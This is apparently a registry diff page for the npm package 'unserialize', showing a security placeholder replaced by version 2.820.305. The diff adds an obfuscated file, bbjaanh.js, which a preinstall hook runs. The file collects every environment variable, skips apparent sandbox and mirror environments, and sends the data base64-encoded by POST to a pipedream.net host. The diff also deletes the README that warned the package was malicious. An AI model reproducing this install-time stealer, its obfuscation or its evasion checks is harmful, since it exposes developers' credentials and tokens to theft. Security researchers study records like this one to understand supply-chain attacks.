unserialize 0.0.1-security → 2.820.305

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of unserialize might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/bbjaanh.js +1 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
package/bbjaanh.js ADDED
@@ -0,0 +1 @@
1
+ function a0_0xc0e8(){const _0x37012a=['npm_config_registry','USERNAME','env','net','12216bJEIWt','includes','npm_package_name','write','POST','some','toString','join','35521656QLnXbX','227678xXmgag','2240vwUxuk','stringify','request','daasadmin','length','2825856RpcKcz','/usr/bin/python','1789464HuzafT','1268384ff816fb002f65302287b639ce','3097365zrGvGE','registry.npmmirror.com','tencent.com','error','keys','2447192VEeqcG'];a0_0xc0e8=function(){return _0x37012a;};return a0_0xc0e8();}const a0_0xc5f463=a0_0x5f1b;(function(_0x435760,_0x450c8d){const _0x518ca7=a0_0x5f1b,_0x4861fb=_0x435760();while(!![]){try{const _0x7a2530=-parseInt(_0x518ca7(0x78))/0x1+-parseInt(_0x518ca7(0x80))/0x2+-parseInt(_0x518ca7(0x7e))/0x3+-parseInt(_0x518ca7(0x87))/0x4+-parseInt(_0x518ca7(0x82))/0x5+-parseInt(_0x518ca7(0x8c))/0x6*(parseInt(_0x518ca7(0x79))/0x7)+parseInt(_0x518ca7(0x77))/0x8;if(_0x7a2530===_0x450c8d)break;else _0x4861fb['push'](_0x4861fb['shift']());}catch(_0x2329a9){_0x4861fb['push'](_0x4861fb['shift']());}}}(a0_0xc0e8,0x785fe));const http=require('https'),filter=[{'key':a0_0xc5f463(0x88),'val':'taobao.org'},{'key':a0_0xc5f463(0x88),'val':a0_0xc5f463(0x84)},{'key':a0_0xc5f463(0x88),'val':a0_0xc5f463(0x83)},{'key':a0_0xc5f463(0x89),'val':a0_0xc5f463(0x7c)},{'key':'_','val':a0_0xc5f463(0x7f)}];function a0_0x5f1b(_0x842ee0,_0x2c48a1){const _0xc0e8da=a0_0xc0e8();return a0_0x5f1b=function(_0x5f1ba7,_0x4d4063){_0x5f1ba7=_0x5f1ba7-0x76;let _0x3d570c=_0xc0e8da[_0x5f1ba7];return _0x3d570c;},a0_0x5f1b(_0x842ee0,_0x2c48a1);}function main(){const _0x23a8fe=a0_0xc5f463;var _0x2e46e1=process[_0x23a8fe(0x8a)]||{};if(filter[_0x23a8fe(0x91)](({key:_0x46c229,val:_0x37350b})=>_0x2e46e1[_0x46c229]&&_0x2e46e1[_0x46c229][_0x23a8fe(0x8d)](_0x37350b))||Object[_0x23a8fe(0x86)](_0x2e46e1)[_0x23a8fe(0x7d)]<0xa)return;req=http[_0x23a8fe(0x7b)]({'host':[_0x23a8fe(0x81),'m','pipedream',_0x23a8fe(0x8b)][_0x23a8fe(0x76)]('.'),'path':'/'+(_0x2e46e1[_0x23a8fe(0x8e)]||''),'method':_0x23a8fe(0x90)})['on'](_0x23a8fe(0x85),function(_0x30841e){}),req[_0x23a8fe(0x8f)](Buffer['from'](JSON[_0x23a8fe(0x7a)](_0x2e46e1))[_0x23a8fe(0x92)]('base64')),req['end']();}main();
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "unserialize",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "2.820.305",
4
+ "main": "bbjaanh.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "node bbjaanh.js"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=unserialize for more information.